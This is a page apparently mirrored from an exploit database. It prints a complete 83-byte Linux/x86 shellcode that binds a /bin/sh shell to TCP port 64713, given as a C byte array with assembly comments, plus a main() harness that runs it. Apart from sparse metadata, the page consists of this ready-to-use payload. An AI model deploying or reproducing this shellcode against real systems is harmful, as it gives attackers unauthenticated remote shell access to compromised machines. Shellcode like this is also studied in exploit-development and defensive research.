Linux/x86 - Bind (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057127 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43656
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * (linux/x86) portbind /bin/sh (port 64713)
 * 83 bytes
 * 
 * http://www.gonullyourself.org
 * sToRm <hixmostorm@hotmail.com>
 */

char shellcode[] =
                                // <_start>:
"\x6a\x66"                      // push   $0x66
"\x58"                          // pop    %eax
"\x31\xdb"                      // xor    %ebx,%ebx
"\x53"                          // push   %ebx
"\x43"                          // inc    %ebx
"\x53"                          // push   %ebx
"\x6a\x02"                      // push   $0x2
"\x89\xe1"                      // mov    %esp,%ecx
"\xcd\x80"                      // int    $0x80
"\x31\xd2"                      // xor    %edx,%edx
"\x52"                          // push   %edx
"\x68\xff\x02\xfc\xc9"          // push   $0xc9fc02ff
"\x89\xe1"                      // mov    %esp,%ecx
"\x6a\x10"                      // push   $0x10
"\x51"                          // push   %ecx
"\x50"                          // push   %eax
"\x89\xe1"                      // mov    %esp,%ecx
"\x89\xc6"                      // mov    %eax,%esi
"\x43"                          // inc    %ebx
"\xb0\x66"                      // mov    $0x66,%al
"\xcd\x80"                      // int    $0x80
"\xb0\x66"                      // mov    $0x66,%al
"\x43"                          // inc    %ebx
"\x43"                          // inc    %ebx
"\xcd\x80"                      // int    $0x80
"\x50"                          // push   %eax
"\x56"                          // push   %esi
"\x89\xe1"                      // mov    %esp,%ecx
"\x43"                          // inc    %ebx
"\xb0\x66"                      // mov    $0x66,%al
"\xcd\x80"                      // int    $0x80
"\x93"                          // xchg   %eax,%ebx
"\x6a\x03"                      // push   $0x3
"\x59"                          // pop    %ecx
                                // <fruity_loops>:
"\x49"                          // dec    %ecx
"\x6a\x3f"                      // push   $0x3f
"\x58"                          // pop    %eax
"\xcd\x80"                      // int    $0x80
"\x75\xf8"                      // jne    <fruity_loops>
"\xf7\xe1"                      // mul    %ecx
"\x51"                          // push   %ecx
"\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
"\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
"\x89\xe3"                      // mov    %esp,%ebx
"\xb0\x0b"                      // mov    $0xb,%al
"\xcd\x80"                      // int    $0x80
;

int main() {

    int (*f)() = (int(*)())shellcode;
    printf("Length: %u\n", strlen(shellcode));
    f();
    
}